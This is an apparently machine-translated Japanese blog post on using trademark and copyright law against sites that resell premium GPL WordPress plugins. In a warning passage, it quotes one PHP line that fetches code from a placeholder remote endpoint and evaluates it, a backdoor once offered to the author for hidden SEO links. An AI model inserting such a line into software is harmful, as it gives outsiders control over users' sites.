荒らしからGPLWordPressプラグインビジネスを合法的に保護するための究極のガイド

ソフトウェアライセンスは、特にオープンソースの世界では、非常に紛らわしいテーマになる可能性があります。 合法性と倫理の境界は必ずしも明確ではありません。 しかし、ビジネスオーナーはWordPress GPLプラグインの販売に焦点を合わせているため、これらのトピックを完全に理解することが私たちの義務です。

この投稿では、倫理については取り上げず、法的な考慮事項に焦点を当てます。 プラグインの「トロール」からWordPressビジネスを保護するために、この分野の経験豊富な弁護士からのフィードバックを含む、段階的な実用的な公式を提供します。

過去5年間、プラグイン開発者として、GPL、その自由、およびGPL準拠のビジネスの運営に関連する課題について説明している記事をたくさん読みました。 しかし、ここ数か月で、このトピックは私にとってさらに重要になりました。

8月、WordPress Plugins（https://twitter.com/plugswp）という名前のTwitterアカウントが私をフォローしました。 習慣として、私は彼らのプロフィールをチェックして、そのユーザーについてもっと知りました。 私はすぐに、ハンドラーが「wppluginscheap.com」に関連付けられていることを発見しました。これは、「安価なプレミアムWordPressプラグインとテーマのナンバーワンソース」と自称するプラグインとテーマの「トロール」です。 サイトを閲覧すると、Yoast SEO、Backup Buddy、WP Robot、50のプレミアムテーマなど、人気のあるプレミアムプラグインがたくさん見つかりました。 各製品は10ドル未満で販売されました。

私は素朴でしたが、WPChatに飛び乗って、新しいスレッドを開始しました。

私たちは皆、いくつかのトロールがポップアップして、GPLプラグイン/テーマをばかげた価格で再販するという脅威の下でコーディングしてきました。 ええと…ここにありますYoastプレミアムSEOを$4.00で購入するのはどうですか…私は少し腹を立てていますが、いつか現れることを知っていたので面白がっています。

私はコミュニティに2つの質問をしました：
1.どうすればそれを削除できますか？
2.脅迫されていると感じますか？

並行して、Advanced WordPress Facebookグループにアクセスし、次のステータスをアップロードしました。

Joost deValkとThomasHofterは、プラグインを10ドル未満で販売し始めない限り、これらの人はあなたの商標（および他の数十のプラグイン開発者）に違反していると思います。 どうやってそれを降ろすのですか？

AWPグループのメンバーである場合は、ここでスレッド全体を確認できます。

どちらのスレッドも多くの関心と議論を生み出しました。 WPChatで17件の返信があり、AWPFacebookグループで84件のコメントがありました。 返信が山積みになり始めたら、私は2つのことに気づきました。
1. WordPressプラグイン/テーマトロールは流行です–それはどこでも起こっています！

これは長い間起こっていますが、主にテーマとWooCommerceアドオンがあります。 gplclub.orgおよびsozot.comを参照してください。 WPAvengers.comは、シャットダウンする前に同様のことを行いました。

–WPChatの創設者であるLelandFiegel

2. GPLライセンスのあらゆる側面に関する何百ものブログ投稿がありますが、エコシステムには依然として多くの混乱があります。 インフルエンサーの間でも。 プラグインとテーマはGPLの下でライセンスされているので、多くの人が技術的には（非倫理的ではありますが）それを行うのは問題ないと考えているようです。

これらの日和見主義者は時々現れ、決して何にもならないようです。 それは合法ですが（とにかくGPLの部分）、非倫理的です。 怠け者です。 そして、商品が疑わしい形で、時代遅れで、サポートされておらず、疑わしいので、それは顧客にとって悪いことです。

–テーマ開発者であり、ProPluginDirectoryの創設者であるStevenGliebe

それは非倫理的ですが、私がGPLの下でリリースするテーマ/プラグインショップの所有者である場合、私はそれらの人たちよりもこれを言うことができれば、私はさらに非倫理的であり、完全な偽善者だと感じます。

–CodeinWPの創設者であるIonutNeagu

Facebookで受け取ったその他のコメントは次のとおりです。

• プラグインがGPLの下でライセンスされている場合、私はそれらが何もできないのではないかと心配しています
• プレミアムバージョンはGPLの下にあるとは思わない
• GPLの下では合法です

そして、それらはもっとたくさんあります！

それで、始める前に、何かをクリアさせてください—

これは完全に間違っています！

プラグインがオープンソースライセンスの下で配布されている場合でも、開発者には強制力のある権利があります。
これらの「プラグイントロール」は、商標権侵害および/または著作権侵害の責任を負う可能性があります。

私はそれらのトロールによってビジネスに害がないという意見をたくさん読んだことを付け加えたいと思います。 もしそうなら、私はこの投稿を編集するのにそれほど多くの時間を費やすことはありません。 トロルがWordPressコミュニティにとって、つまりあなたのビジネスにとっても、WordPressユーザーにとっても悪い理由を説明する機会を利用したいと思います。

プラグイントロールがプラグインビジネスに悪いのはなぜですか？

失われた収入

好むと好まざるとにかかわらず、多くのユーザーがこのWebサイトからプレミアムプラグインを購入または入手します。 特にWordPressの初心者。 私がWordPressエコシステムに不慣れで、SEOプラグインを探しているなら、4ドルのYoastSEOは正規価格よりもはるかに魅力的に聞こえます。 私はそれを買うでしょう。 スマートフォンや他の商品を購入するとき、いつも最高の割引を探すのと同じように。 購入した商品と一緒に使用したことがないので、「元の保証」は必要ありません。そのため、サポートは最初からユーザーが念頭に置いているものではありません。

虐待をサポートする

トロールから購入したプラグインに問題がある場合は、誰がその責任を負っていると思いますか？ もちろん、本当の開発者/会社。 あなたのブランドに関連するアートワークが複製されている場合、顧客から連絡があります。 AmazonでHTCスマートフォンを購入した場合と同じように、デバイスに問題が発生した場合は、AmazonではなくHTCテクニカルサポートに連絡します。 ユーザーに何を伝えますか？ 「はい、それは私たちの電話ですが、テクニカルサポートについてはAmazonに連絡する必要があります。」 この応答は、ユーザーが理解するのが難しいでしょう。それはあなたがあなたの製品の後ろに立っていないように見えます。

トロールから購入したプラグインに問題がある場合–誰がその責任を負っていると思いますか？

ブランドダメージ

一部のトロールが悪意のあるコードをプラグインに挿入することは間違いありません。 これを行う主な動機は、プレミアムプラグインを無料で配布しながら収益を上げることです。 私はこれを自分で目撃しました。 2年前、私はBIG UKを拠点とする代理店（100人以上の従業員）の上級SEO担当者から連絡を受けました。 。 彼は、プラグインに1行の簡単なコードを追加することで、私と提携することを提案しました。
eval(wp_remote_get( 'http://www.company.com/path/to/api/endpoint/' )['body']);

APIエンドポイントは、ポートフォリオ企業のバックリンクをプッシュするために非表示のURLを返すという考え方でした。 彼が送った例の1つは次のとおりです。

<a href="”http://www.portfolio-company.com”">Great Company</a>

トロールは、元のブランドを使用しているときに悪意のあるコードをプラグインに挿入する可能性があり、ブランドに直接的な損害を与えます！

これはGooglePenguinの前であり、優れたSEOハックでした。 また、このオファーは素晴らしく、ドメインあたり月額$0.1でした。 したがって、プラグインを使用して100,000のアクティブなドメインがある場合、月額$10,000を生成できます。 余分な時間を費やすことなく収益。 素晴らしいですよね？ 明らかに、このコードが非常に悪意のあるものであったことが主な理由で、さまざまな理由でそれを実行しませんでした。 リモートバックドアが開き、サイトでやりたいことが何でもできます。 代理店がSEOにのみ使用することを意図していたとしても、サーバーがハッキングされ、悪意のある人が制御を奪った場合はどうなりますか？ 正当なWordPress.orgプラグインがそのエージェンシーと提携したことを誰が知っていますか…トロルに戻ると、彼らの意図は純粋に経済的です。 彼らは楽しみのためにあなたのプレミアムプラグインを宣伝しません、彼らはお金を稼ぎたいです。 そして、彼らが著作権や商標権侵害のような違法なことをしたとしても、コードインジェクションのような代替の収入源を生み出すことを妨げるものは何もありません。 ああ、そして私はそのようなことが起こった場合、あなたが非難される人であることを言及するのを忘れました！ それはあなたの製品であり、あなたのブランドです。

プラグイントロールがユーザーに悪いのはなぜですか？

私が述べたのと同じ理由の多くのために、しかしユーザーの観点から。

サポートなし

技術的な問題に直面したとき、トロルはあなたを助けることができません。 それは彼らの製品ではなく、彼らはコードや関連する問題を解決する方法についての手がかりを持っていません。 さらに、彼らはそれを行うためのサポートリソースを持っていません。 また、元の会社に連絡しようとすると、プレミアムプラグイン開発者は顧客を追跡するためのインフラストラクチャを備えています。 あなたがオリジナルのライセンスを購入するまで、会社はしばしばあなたを助けません。

プラグインの違法な再配布者は、技術的な問題を解決することはできません。

自動更新なし

現在市場に出回っているほとんどのプレミアムプラグインには、ライセンスと更新のメカニズムがあります（トロールは、プラグインを再配布する前に、この部分を「ハッキング」することがよくあります）。 この自動更新メカニズムが機能する方法は、24時間に1回、プラグインが元の会社のサーバーをチェックして、プレミアムバージョンの更新があるかどうかを確認することです。 また、ライセンスキーで認証します。 トロールのプラグインは元の会社のライセンスキーで発行されたことがないため、この更新メカニズムは機能しません。 したがって、オリジナルではないプレミアムプラグインがインストールされるたびに、自動更新は行われません。 ハッカーは常に新しいクリエイティブな脆弱性を見つけており、古いプレミアムプラグインがセキュリティリークの可能性があるため、これは悪いことです。

海賊版のWordPressプラグインには、自動更新メカニズムがありません–一定のセキュリティの脆弱性！ツイート

主要なセキュリティリーク

上記の悪意のある1行のコードを覚えていますか？ サイトへのバックドアをハッカーに開放したいですか？ このバックドアは、文字通り、ハッカーがサイト上のすべてのピクセルとコンテンツを変更できるようにします。 そしてそれはほんの一例です、私はそこに他の多くの創造的な注入があると確信しています。

オープンソースライセンスは何をカバーしていますか？

開発者コミュニティではこれらの問題について明らかに多くの混乱があるため、Lowenstein Sandler LLPの知的財産（IP）（特許、商標、著作権）の弁護士である友人のArielReinitzと彼の同僚のMatthewHintzに連絡しました。ニューヨークからパロアルトまでオフィスを構える全国的な企業。

Arielは、WPプラグインの「trolls」は技術的にはオープンソースライセンス（GPLなど）の下にあるコードを再配布する権利があるかもしれませんが、オープンソースではカバーされていない他の知的財産（「IP」）の権利があると説明しましたこれらの「トロール」がまだ侵害している可能性のあるライセンス。

アリエルがGPLについて言わなければならないことは次のとおりです。

ほとんどのWordPressプラグインが配布されているオープンソースライセンス（GPLv2）が何をカバーしているのか（そしてカバーしていないのか）を理解することが重要です。

オープンソースライセンスは、ソフトウェア/ソースコードの配布方法を規定します。 一般に、このようなライセンスでは、誰でもソフトウェア/コードを無料で使用、変更などできます。 したがって、オープンソースプロジェクトのソースコードは、GPLの条件に違反することなく、他の当事者によって再配布される可能性があります。

簡単に言えば、GPLの自由により、誰でもソースコードを取得して、配布を含め、好きなことを行うことができます。 コミュニティのその部分についてはコンセンサスがあると思います。

オープンソースライセンスは何をカバーしていませんか？

ただし、オープンソースライセンス（GPLv2を含む）は通常、商標には適用されません。 商標は、製品（プラグイン、テーマ、アプリなど）のブランド化の方法に関係します。たとえば、製品の名前（および/または製品の製造元の会社）、タグライン/スローガン、および/またはそのロゴ。 したがって、プロジェクトのソースコードはオープンソースライセンスの下で自由に再配布できますが、そのようなライセンスは、プロジェクトに関連する商標（たとえば、製品名、それを開発した会社、等。）。

弁護士以外の言葉で言えば、GPLは、製品名、会社名、ロゴなどのプラグインの商標を使用することを許可していません。 アリエルは私たちに例を与えます：

したがって、たとえば、サードパーティがプロジェクトの元のブランドをすべて使用してWordPressプラグインを再配布する場合（たとえば、会社/プロジェクトの元の名前、ロゴなどで宣伝する場合）、これは元の開発者の商標を侵害する可能性があります権利。 すでに述べたように、オープンソースライセンスでは、誰かが他の誰かのブランドを商業的な文脈で使用することは許可されていません。 商標法の主要な原則の1つは、製品がどこから来ているかについての混乱から消費者を保護することであるため、これは重要です。

商標法の主な原則は、ビジネスを保護することだけでなく、製品がどこから来ているかについての混乱から消費者を保護することです。 それは重要な注意です！

また、多くのオープンソース企業が商標権を登録、保護、および取り締まっていることを認識することも重要です。 例としては、 Linux 、 MySQL 、 Red Hat 、 WordPressなどがあります。

アリエルがここで言っていることは、オープンソースの最大の名前の多くが彼らの商標権を保護し、取り締まっているということです。 なぜ私たちは同じことをすべきではないのですか？

Red Hatが商標権を保護および監視できるのであれば、開発者をプラグインできないのはなぜですか？

商標権に加えて、Arielは、開発者はソースコードの一部ではない素材の著作権保護も受ける権利があると指摘しました。

GPL（およびその他のオープンソースライセンス）はプラグイン自体のソースコードのみをカバーしていることを認識することも重要です。 ただし、開発者がソースコードの一部ではない資料（グラフィック、販促資料、パッケージなど）を作成した場合、それらの資料はGPLに該当せず、開発者は他の当事者を許可する義務を負わないことになります。資料を再配布します。

たとえば、上記の「troll」サイトのいくつかで「Yoast」プラグインがどのように機能しているかを見てみましょう。 これらのサイトは技術的にYoastのソースコードを再配布できる可能性がありますが（GPLに該当するため）、これらのサイトには、Yoastのブランド（商標であるYoastの名前やロゴなど）や、 Yoast（たとえば、Yoastのソースコードの一部ではないため、著作権はYoastが所有し、GPLの対象ではない、お茶を飲む男のグラフィック）。

したがって、トロールはYoastのソースコードを再配布する権利を法的に与えられている可能性がありますが、GPL（または別のオープンソースライセンス）は、（a）Yoastのブランド（商標）または（b）その他のグラフィック、素材などを使用する権利を与えません。 。、（著作権） 。 これらはプラグインのソースコードの一部ではないため、これらのアイテムはGPLに該当せず、したがって、これらのアイテムに対する知的財産（IP）の権利は開発者の唯一の財産です。

プラグイン「trolls」は開発者の商標と著作権で保護された素材を使用しているため（上​​記の「Yoast」の例のように）、開発者がこれらの権利を行使するために使用できる法的手続きがあります（以下で詳しく説明します）。これらの「トロール」がビジネスに与える可能性のある影響を停止、阻止、または少なくとも制限しようとします。 繰り返しますが、プラグインがGPLの下で配布されている場合でも、これは当てはまります。

商標によって保護されているものは何ですか？

マシューは、商標がカバーするものを説明します：

簡単に言えば、商標は消費者にとって一意の識別子であり、商品やサービスの出所を他のものと区別します。 ほとんどの場合、商標は単語、ロゴ、またはこれらの要素の組み合わせです。 米国では、商標権は、米国特許商標庁（USPTO）への登録ではなく、商取引での使用から始まります（「コモンローの権利」と呼ばれます）。 ただし、USPTOに商標を登録すると、コモンローの権利では利用できない多くの利点が所有者に提供されます。 特に、これらには、登録に記載された商品またはサービスに関連して米国全体でマークを使用する登録者の排他的権利の証拠、登録者が商標の所有者であるという建設的な通知、USPTOの登録のリストが含まれます。オンラインデータベース、およびシンボルを使用する機能。 （登録前は、TMシンボルを商標とともに使用できます。）

コードは商標で保護されていますか？

調査中に、GPLライセンスのプラグインまたはテーマをフォークする場合、関数名の一部として商標識別子を含む関数がないことを確認するためにコードをリファクタリングする必要があることを示すいくつかの投稿を読みました。 それを明確にするために、私はコードが商標によっても保護されているかどうかマシューに尋ねました、そしてここに答えがあります：

コード自体は商標によって保護されていません。 商標は、消費者があなたの商品やサービスに関連付ける単語やロゴを保護します。 プラグインの商標保護の制限は、プラグインを消費者に販売するために使用される単語またはロゴになります。 そして、商標侵害の基本的なテストは、消費者が2つのマークの類似性によって混乱する可能性があるかどうかです。 類似性は、視覚的および音声的な類似性、各マークの商品/サービスの密接な関係、マークの特徴、およびマークの使用期間などを調べることによって評価されます。

開発者にわかりやすい言語で答えを明確にするには：

• クラス名、関数名、変数名、定数名は商標で保護されていません。
• 一方、ページに印刷され、エンドユーザーに表示される文字列は、商標によって保護されています。

商標登録をする方法は？

商標の連邦登録のメリットを得るには、商標をUSPTOに登録する必要があります。 登録申請には、基本情報を含める必要があります。申請者/所有者の名前、マーク、マークが使用される商品またはサービス、それらの商品またはサービスでのマークの使用の証拠、およびそのマークの最初の使用日。 アプリケーションに関する考慮事項：

• USPTOのTESS（http://www.uspto.gov/trademark）データベースで、同じまたは類似のマークを検索します。 同じまたは類似のマークが申請されているか、すでに登録されている場合、これらは申請の却下の根拠となる可能性があります。 また、マークは登録なしで使用でき、登録していてもそのマークに対して優れた権利を持っている可能性があるため、Googleまたは他の検索サービスを介して検索してください。 登録は、前のユーザーの商標権を使い果たすことはありません。
• 商品やサービスの説明については、USPTOのIDマニュアルで受け入れ可能な言語を検索してください：http： //tess2.uspto.gov/netahtml/tidm.html 。 TESSで受け入れ可能な言語を検索することもできます。
• クラスは、商品またはサービスの特定のフィールドに関連する一般的な指標です。 たとえば、ダウンロード可能なプラグインは通常、すべてのコンピュータプログラムとソフトウェアをカバーするクラス9にあります。
• 商標出願の手数料は、クラスの数によって決まります。 一般料金はクラスあたり275ドルですが、より安価でより高価なファイリングオプションを利用できます。

出願後、USPTOは出願を調べて、標章が一意の識別子であるかどうかを判断します（つまり、以前に提出された出願または登録と説明的または紛らわしいほど類似していない）。 USPTOは、アプリケーションのタイムラインを提供します： http ://www.uspto.gov/trademark/trademark-timelines/trademark-application-and-post-registration-process-timelines 。

商標保護は地域的なものであることに注意してください。 たとえば、米国での登録は、米国での商標保護を提供します。

マシューが説明したように、プロセスは必ずしも複雑ではありませんが、時間と労力がかかります。 私はあなたのためにそれをするために中堅の弁護士に支払うことをお勧めします。 それはあなたの時間を節約し、より良いアプリケーションを確実にするでしょうが、それはあなたに仕事のために200ドルから2,000ドルの費用がかかるはずです。 いずれにせよ、始める前に、それをグーグルで検索してください！ 正確な用語/フレーズに一致する製品または会社（特に同じまたは類似の分野）を見つけた場合、商標を登録できない可能性が高くなります（実際に他人の'に違反している可能性があります）。

商標が侵害された場合はどうすればよいですか？

まず、すべきでないことから始めましょう。著作権ではなく商標権侵害である場合は、DMCAの削除を申請しないでください。

DMCAは著作権侵害のみを対象としています。 商標については、同様の規定はありません。 商標の申し立てにDMCA削除通知を使用すると、申し立て者が虚偽の陳述に対して責任を負う可能性があります。

一般に、ウェブサイトの所有者と直接問題を解決しようとするのが最も簡単です。 これがうまくいかない場合は、ウェブサイトの所有者やホストなどに対して法的措置を講じることができます。採用する具体的なアプローチはケース固有である可能性が高く、現時点では、弁護士に連絡して、特定の状況での最善の選択肢を理解することをお勧めします。 。

著作権で保護されているものは何ですか？

著作権は商標とは異なります。 著作権は、表現の媒体に固定されたオリジナルの著作物を保護します。 ただし、著作権保護の限界は、それが表現にのみ適用され、アイデアには適用されないことです。 著作権保護のための作品のカテゴリーには、文学作品（本、コード）、音楽作品、写真と画像、映画、録音物などのカテゴリーが含まれます。 もう1つの制限は、著作権は短いフレーズや表現を保護しないことです。これは、商品やサービスのソースを他のソースと区別する消費者の一意の識別子として機能する限り、商標保護のために残ります。

あなたの著作権が侵害された場合はどうすればよいですか？

1. 最初は、ウェブサイトの所有者に直接連絡するのが最も簡単なことがよくあります。 多くの場合、ウェブサイトの所有者は、あなたが弁護士を雇ったり、訴訟に関与したりすることに関心があるだけです。Twitterアカウントを見つけて、サイトのメールまたは連絡先ページに連絡し、削除を要求するメッセージを送信してください。ウェブサイトからの商標プラグイン。
2. それでも問題が解決しない場合は、DMCA削除通知（デジタルミレニアム著作権法）を送信できます。 ジェネレーターの作成に役立つジェネレーターがたくさんあります。「dmcatakedowngenerator」をグーグルで検索してください。 通知を受け取ったら、サイトの所有者、ホスティング会社、およびISPに通知を送信する必要があります。 オプションで、検索エンジンに通知を送信して、検索結果からサイトを削除することもできます。 ホスティング会社を見つけるには、whoishostingthis.comなどのWebサイトを使用できます。 ISPを見つけるには、http：//www.whoismyisp.org/などのWebサイトを使用できます。 DMCAをISP/ホスティングに提出するための関連リンクを見つけるには、ISP_NAME / HOSTING_NAME+DMCAをグーグルで検索してください。

または、ウェブサイトの所有者やホストなどに対して訴訟を起こすこともできます。弁護士に連絡して、これが特定の状況で最善の選択肢であるかどうかを理解することをお勧めします。

結論

この一連のステップバイステップの説明が、GPLプラグインビジネスを荒らしから保護するための適切なツールを提供してくれることを願っています。 要約：

• 事業主として、あなたは資格があり、あなたの会社のブランドと資産を保護する必要があります。
• 商標と著作権は、プラグインビジネスを合法的に保護するための比較的安価で効果的な方法です。 したがって、会社名および製品名の商標登録を強く検討する必要があります。
• 多くのトロールは、著作権（プロモーション用のグラフィックを持ち上げるなど）と商標（ブランド名を使用するなど）の両方を侵害しています。 独自のブランド名、ロゴ、アートワークを作成することで、著作権侵害と戦うのに役立つポートフォリオを生成します。

多くのトロールは著作権と商標の両方を侵害しています。 独自のブランド名、ロゴ、アートワークを作成することで、著作権侵害と戦うのに役立つポートフォリオを生成します。ツイート

サードパーティのWebサイトに、お客様の同意なしに、販売または景品としてプレミアムGPLプラグインまたはテーマが掲載されている場合：

• ウェブサイトがオリジナルのアートワークやその他の素材を使用している場合、それは著作権侵害である可能性があります。 DMCAの削除を申請できます。
• Webサイトが会社または製品の商標を使用している場合は、商標権を侵害している可能性があります。 あなたはウェブサイトに対して法的手続きを開始することができます。

GPLの法的および倫理的影響について他にご意見がございましたら、以下のコメントでお気軽に共有してください。

素晴らしい参考文献：

• WP MigrateDBProのフォークに対して発行されたDMCA削除通知
• GPLライセンスは、登録商標を侵害する自由を提供しません
• WordPress GPLは悪用されていますか？
• なぜGPLライセンスコードにお金を払っているのですか？